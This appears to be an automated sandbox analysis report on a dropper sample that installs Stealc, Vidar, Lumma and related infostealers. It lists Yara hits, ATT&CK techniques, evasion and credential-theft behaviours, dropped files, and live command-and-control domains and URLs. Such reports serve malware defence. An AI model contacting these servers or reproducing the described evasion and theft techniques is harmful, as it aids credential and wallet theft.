                              Yara detected RHADAMANTHYS Stealer
                              Source: Yara matchFile source: 00000013.00000003.2359297858.0000000004C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000013.00000003.2350817257.0000000000E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000014.00000003.2359022385.0000000003350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000014.00000002.2372094151.0000000003360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Yara detected Stealc
                              Source: Yara matchFile source: 0000000A.00000002.2486440512.0000000000CA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000A.00000002.2492560230.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000A.00000003.1976633314.00000000053A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 3m20j.exe PID: 5932, type: MEMORYSTR
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Yara detected Vidar stealer
                              Source: Yara matchFile source: Process Memory Space: 3m20j.exe PID: 5932, type: MEMORYSTR
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF90B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,10_2_6BF90B40
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEB8EA0 sqlite3_clear_bindings,10_2_6BEB8EA0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF90D60 sqlite3_bind_parameter_name,10_2_6BF90D60
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF90C40 sqlite3_bind_zeroblob,10_2_6BF90C40
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEB63C0 PR_Bind,10_2_6BEB63C0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE422D0 sqlite3_bind_blob,10_2_6BE422D0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEB60B0 listen,WSAGetLastError,10_2_6BEB60B0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEB6070 PR_Listen,10_2_6BEB6070
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEBC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,10_2_6BEBC050
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEBC030 sqlite3_bind_parameter_count,10_2_6BEBC030
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEB6410 bind,WSAGetLastError,10_2_6BEB6410

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting                              		Valid Accounts31
                              Windows Management Instrumentation                              		1
                              Scripting                              		1
                              DLL Side-Loading                              		11
                              Disable or Modify Tools                              		2
                              OS Credential Dumping                              		1
                              System Time Discovery                              		Remote Services11
                              Archive Collected Data                              		14
                              Ingress Tool Transfer                              		Exfiltration Over Other Network Medium1
                              System Shutdown/Reboot
                              CredentialsDomainsDefault Accounts12
                              Native API                              		1
                              DLL Side-Loading                              		1
                              Extra Window Memory Injection                              		11
                              Deobfuscate/Decode Files or Information                              		21
                              Input Capture                              		23
                              File and Directory Discovery                              		Remote Desktop Protocol41
                              Data from Local System                              		21
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts3
                              Command and Scripting Interpreter                              		11
                              Scheduled Task/Job                              		1
                              Access Token Manipulation                              		4
                              Obfuscated Files or Information                              		Security Account Manager3511
                              System Information Discovery                              		SMB/Windows Admin Shares1
                              Email Collection                              		1
                              Remote Access Software                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts11
                              Scheduled Task/Job                              		1
                              Registry Run Keys / Startup Folder                              		212
                              Process Injection                              		23
                              Software Packing                              		NTDS1291
                              Security Software Discovery                              		Distributed Component Object Model21
                              Input Capture                              		4
                              Non-Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud Accounts1
                              PowerShell                              		Network Logon Script11
                              Scheduled Task/Job                              		1
                              Timestomp                              		LSA Secrets13
                              Process Discovery                              		SSHKeylogging115
                              Application Layer Protocol                              		Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                              Registry Run Keys / Startup Folder                              		1
                              DLL Side-Loading                              		Cached Domain Credentials481
                              Virtualization/Sandbox Evasion                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              Extra Window Memory Injection                              		DCSync1
                              Application Window Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                              Masquerading                              		Proc Filesystem1
                              Remote System Discovery                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt481
                              Virtualization/Sandbox Evasion                              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                              Access Token Manipulation                              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd212
                              Process Injection                              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                              Rundll32                              		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578280 Sample: Tii6ue74NB Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 127 sweepyribs.lat 2->127 129 grannyejh.lat 2->129 131 4 other IPs or domains 2->131 177 Suricata IDS alerts for network traffic 2->177 179 Found malware configuration 2->179 181 Antivirus detection for dropped file 2->181 183 22 other signatures 2->183 13 Tii6ue74NB.exe 1 4 2->13         started        16 skotes.exe 2->16         started        19 skotes.exe 2->19         started        21 3 other processes 2->21 signatures3 process4 file5 115 C:\Users\user\AppData\Local\...\i9z22.exe, PE32 13->115 dropped 117 C:\Users\user\AppData\Local\...\4l693L.exe, PE32 13->117 dropped 23 i9z22.exe 1 4 13->23         started        169 Hides threads from debuggers 16->169 171 Tries to detect sandboxes / dynamic malware analysis system (registry check) 16->171 173 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->173 175 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 21->175 signatures6 process7 file8 99 C:\Users\user\AppData\Local\...\P0D95.exe, PE32 23->99 dropped 101 C:\Users\user\AppData\Local\...\3m20j.exe, PE32 23->101 dropped 221 Antivirus detection for dropped file 23->221 223 Machine Learning detection for dropped file 23->223 27 P0D95.exe 1 4 23->27         started        31 3m20j.exe 38 23->31         started        signatures9 process10 dnsIp11 103 C:\Users\user\AppData\Local\...\2i7672.exe, PE32 27->103 dropped 105 C:\Users\user\AppData\Local\...\1I15f6.exe, PE32 27->105 dropped 251 Antivirus detection for dropped file 27->251 253 Machine Learning detection for dropped file 27->253 34 1I15f6.exe 4 27->34         started        38 2i7672.exe 27->38         started        163 185.215.113.206, 49737, 49765, 80 WHOLESALECONNECTIONSNL Portugal 31->163 165 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 31->165 167 127.0.0.1 unknown unknown 31->167 107 C:\Users\user\Documents\HIDGCFBFBF.exe, PE32 31->107 dropped 109 C:\Users\user\AppData\...\softokn3[1].dll, PE32 31->109 dropped 111 C:\Users\user\AppData\Local\...\random[3].exe, PE32 31->111 dropped 113 11 other files (7 malicious) 31->113 dropped 255 Detected unpacking (changes PE section rights) 31->255 257 Attempt to bypass Chrome Application-Bound Encryption 31->257 259 Drops PE files to the document folder of the user 31->259 261 10 other signatures 31->261 41 cmd.exe 31->41         started        43 chrome.exe 31->43         started        file12 signatures13 process14 dnsIp15 97 C:\Users\user\AppData\Local\...\skotes.exe, PE32 34->97 dropped 185 Multi AV Scanner detection for dropped file 34->185 187 Detected unpacking (changes PE section rights) 34->187 189 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 34->189 197 2 other signatures 34->197 45 skotes.exe 3 57 34->45         started        135 grannyejh.lat 104.21.64.80, 443, 49731, 49733 CLOUDFLARENETUS United States 38->135 191 Tries to evade debugger and weak emulator (self modifying code) 38->191 193 Hides threads from debuggers 38->193 195 Tries to detect sandboxes / dynamic malware analysis system (registry check) 38->195 50 HIDGCFBFBF.exe 41->50         started        52 conhost.exe 41->52         started        137 192.168.2.4, 443, 49672, 49723 unknown unknown 43->137 139 239.255.255.250 unknown Reserved 43->139 54 chrome.exe 43->54         started        file16 signatures17 process18 dnsIp19 157 185.215.113.43, 49730, 49732, 49741 WHOLESALECONNECTIONSNL Portugal 45->157 159 31.41.244.11, 49735, 49743, 49772 AEROEXPRESS-ASRU Russian Federation 45->159 119 C:\Users\user\AppData\...\7ab555facf.exe, PE32 45->119 dropped 121 C:\Users\user\AppData\...\3800cab1bc.exe, PE32 45->121 dropped 123 C:\Users\user\AppData\...\ae64e67a81.exe, PE32 45->123 dropped 125 9 other malicious files 45->125 dropped 263 Multi AV Scanner detection for dropped file 45->263 265 Detected unpacking (changes PE section rights) 45->265 267 Tries to detect sandboxes and other dynamic analysis tools (window names) 45->267 275 2 other signatures 45->275 56 5813f66ed1.exe 45->56         started        60 3800cab1bc.exe 45->60         started        62 ae64e67a81.exe 45->62         started        64 5 other processes 45->64 269 Tries to evade debugger and weak emulator (self modifying code) 50->269 271 Hides threads from debuggers 50->271 273 Tries to detect sandboxes / dynamic malware analysis system (registry check) 50->273 161 www.google.com 172.217.19.228, 443, 49749, 49750 GOOGLEUS United States 54->161 file20 signatures21 process22 dnsIp23 141 cheapptaxysu.click 104.21.67.146, 443, 49742, 49745 CLOUDFLARENETUS United States 56->141 225 Antivirus detection for dropped file 56->225 227 Multi AV Scanner detection for dropped file 56->227 229 Detected unpacking (changes PE section rights) 56->229 249 4 other signatures 56->249 143 github.com 20.233.83.145 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 60->143 145 raw.githubusercontent.com 185.199.108.133 FASTLYUS Netherlands 60->145 231 Machine Learning detection for dropped file 60->231 233 Adds a directory exclusion to Windows Defender 60->233 66 d1a239d4e2ee4a8aa1443a088d48cd64.exe 60->66         started        70 powershell.exe 60->70         started        72 powershell.exe 60->72         started        74 conhost.exe 60->74         started        235 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 62->235 237 Tries to evade debugger and weak emulator (self modifying code) 62->237 239 Hides threads from debuggers 62->239 241 Switches to a custom stack to bypass stack traces 62->241 76 svchost.exe 62->76         started        78 WerFault.exe 62->78         started        147 fivetk5vt.top 176.53.146.212, 49774, 80 VANNINVENTURESGB United Kingdom 64->147 149 home.fivetk5vt.top 64->149 151 httpbin.org 98.85.100.80, 443, 49769 TWC-11351-NORTHEASTUS United States 64->151 243 Uses schtasks.exe or at.exe to add and modify task schedules 64->243 245 Injects a PE file into a foreign processes 64->245 247 Tries to detect sandboxes / dynamic malware analysis system (registry check) 64->247 80 cmd.exe 64->80         started        82 7ab555facf.exe 64->82         started        84 6 other processes 64->84 signatures24 process25 dnsIp26 133 aspecteirs.lat 104.21.66.85 CLOUDFLARENETUS United States 66->133 199 Detected unpacking (changes PE section rights) 66->199 201 Query firmware table information (likely to detect VMs) 66->201 203 Tries to harvest and steal ftp login credentials 66->203 219 2 other signatures 66->219 205 Loading BitLocker PowerShell Module 70->205 86 conhost.exe 70->86         started        88 conhost.exe 72->88         started        207 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 76->207 209 Checks if the current machine is a virtual machine (disk enumeration) 76->209 211 Switches to a custom stack to bypass stack traces 76->211 213 Writes to foreign memory regions 80->213 215 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 80->215 90 conhost.exe 80->90         started        217 Tries to steal Crypto Currency Wallets 82->217 92 chrome.exe 84->92         started        95 conhost.exe 84->95         started        signatures27 process28 dnsIp29 153 142.250.181.132 GOOGLEUS United States 92->153 155 www.google.com 92->155

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              Tii6ue74NB.exe100%AviraTR/Crypt.TPM.Gen
                              Tii6ue74NB.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe100%AviraTR/Crypt.TPM.Gen
                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exe100%AviraTR/Crypt.TPM.Gen
                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe100%AviraTR/Crypt.TPM.Gen
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.TPM.Gen
                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exe100%AviraTR/Crypt.TPM.Gen
                              C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe100%AviraTR/Crypt.XPACK.Gen
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.XPACK.Gen
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe100%AviraTR/Crypt.TPM.Gen
                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\4l693L.exe100%AviraTR/Crypt.TPM.Gen
                              C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\4l693L.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exe100%Joe Sandbox ML
                              C:\ProgramData\freebl3.dll0%ReversingLabs
                              C:\ProgramData\mozglue.dll0%ReversingLabs
                              C:\ProgramData\msvcp140.dll0%ReversingLabs
                              C:\ProgramData\nss3.dll0%ReversingLabs
                              C:\ProgramData\softokn3.dll0%ReversingLabs
                              C:\ProgramData\vcruntime140.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe53%ReversingLabsWin32.Trojan.Generic
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe47%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe11%ReversingLabsWin32.Infostealer.Tinba
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe53%ReversingLabsWin32.Infostealer.Tinba
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe71%ReversingLabsWin32.Trojan.LummaStealer
                              C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe53%ReversingLabsWin32.Trojan.Generic
                              C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe47%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                              C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe11%ReversingLabsWin32.Infostealer.Tinba
                              C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe71%ReversingLabsWin32.Trojan.LummaStealer
                              C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exe53%ReversingLabsWin32.Infostealer.Tinba
                              C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe53%ReversingLabsWin32.Infostealer.Tinba
                              C:\Users\user\Documents\HIDGCFBFBF.exe53%ReversingLabsWin32.Infostealer.Tinba

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              No Antivirus matches

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              cheapptaxysu.click
                              		104.21.67.146
                              		truetrue
                                home.fivetk5vt.top
                                		176.53.146.212
                                		truetrue
                                  fivetk5vt.top
                                  		176.53.146.212
                                  		truetrue
                                    github.com
                                    		20.233.83.145
                                    		truefalse
                                      grannyejh.lat
                                      		104.21.64.80
                                      		truetrue
                                        raw.githubusercontent.com
                                        		185.199.108.133
                                        		truefalse
                                          aspecteirs.lat
                                          		104.21.66.85
                                          		truetrue
                                            www.google.com
                                            		172.217.19.228
                                            		truefalse
                                              httpbin.org
                                              		98.85.100.80
                                              		truefalse
                                                sweepyribs.lat
                                                		unknown
                                                		unknowntrue

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://185.215.113.206/68b591d6548ec281/softokn3.dlltrue
                                                    http://185.215.113.206/true
                                                      aspecteirs.lattrue
                                                        http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745?argument=bUbC3wV0kP2YsIRM1734614448true
                                                          http://185.215.113.43/Zu7JuNko/index.phptrue
                                                            http://185.215.113.206/68b591d6548ec281/freebl3.dlltrue
                                                              http://185.215.113.206/68b591d6548ec281/nss3.dlltrue
                                                                sustainskelet.lattrue
                                                                  rapeflowwj.lattrue
                                                                    https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                                                      185.215.113.206/c4becf79229cb002.phptrue
                                                                        energyaffai.lattrue
                                                                          https://aspecteirs.lat/apitrue
                                                                            http://detectportal.firefox.com/canonical.htmlfalse
                                                                              grannyejh.lattrue
                                                                                http://185.215.113.206/68b591d6548ec281/vcruntime140.dlltrue
                                                                                  http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745true
                                                                                    necklacebudi.lattrue
                                                                                      http://185.215.113.16/mine/random.exefalse
                                                                                        http://185.215.113.206/68b591d6548ec281/sqlite3.dlltrue
                                                                                          https://cheapptaxysu.click/apitrue
                                                                                            http://fivetk5vt.top/v1/upload.phptrue

                                                                                              URLs from Memory and Binaries

                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                              https://www.cloudflare.com/learning/access-management/phishing-attack/5813f66ed1.exe, 0000000C.00000003.2065972108.0000000001126000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2190681116.0000000001122000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000002.2290875133.0000000001124000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                https://duckduckgo.com/chrome_newtab3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104357704.0000000005ACB000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104619063.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  https://duckduckgo.com/ac/?q=3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104357704.0000000005ACB000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104619063.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    http://185.215.113.206/c4becf79229cb002.phpdh)j3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2504860835.000000000BFC3000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2164670345.0000000005A97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        http://www.fontbureau.com/designersfc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          https://cheapptaxysu.click/apifTH5813f66ed1.exe, 0000000C.00000003.2289524633.000000000118B000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2289309472.0000000001187000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000002.2291144627.000000000118C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            http://185.215.113.206/c4becf79229cb002.phpds3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              http://www.sajatypeworks.comfc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                https://curl.se/docs/hsts.html941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  http://www.founder.com.cn/cn/cThefc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    https://api.libertyreserve.com/beta/xml/transfer.aspxfc1570cd0d.exe, 00000011.00000002.2295811888.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000011.00000000.2223737952.0000000000732000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                      https://grannyejh.lat:443/api2i7672.exe, 00000005.00000003.1960896276.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000002.1961723351.0000000000818000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi5813f66ed1.exe, 0000000C.00000003.2164670345.0000000005A97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          http://www.galapagosdesign.com/DPleasefc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            https://cheapptaxysu.click/apiwTY5813f66ed1.exe, 0000000C.00000003.2289524633.000000000118B000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2289309472.0000000001187000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000002.2291144627.000000000118C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              http://185.215.113.206/c4becf79229cb002.phper3m20j.exe, 0000000A.00000002.2486440512.0000000000E07000.00000040.00000001.01000000.0000000D.sdmp, 3m20j.exe, 0000000A.00000002.2492560230.00000000017D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                http://www.urwpp.deDPleasefc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  http://185.215.113.206/nal3m20j.exe, 0000000A.00000002.2504860835.000000000BFD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    http://www.zhongyicts.com.cnfc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      https://api.libertyreserve.com/beta/xml/balance.aspxfc1570cd0d.exe, 00000011.00000002.2295811888.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000011.00000000.2223737952.0000000000732000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc943m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2504860835.000000000BFC3000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2164670345.0000000005A97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          http://185.215.113.206/c4becf79229cb002.php2I3m20j.exe, 0000000A.00000002.2504860835.000000000BFD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            http://www.mozilla.com/en-US/blocklist/3m20j.exe, 0000000A.00000002.2513931504.000000006C1BD000.00000002.00000001.01000000.0000001A.sdmpfalse
                                                                                                                                              https://stackoverflow.com/q/14436606/23354fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.0000000003881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.000000000394D000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2319337155.00000000051C0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                https://api.libertyreserve.com/beta/xml/history.aspxfc1570cd0d.exe, 00000011.00000000.2223737952.0000000000732000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104357704.0000000005ACB000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104619063.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl05813f66ed1.exe, 0000000C.00000003.2162768069.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
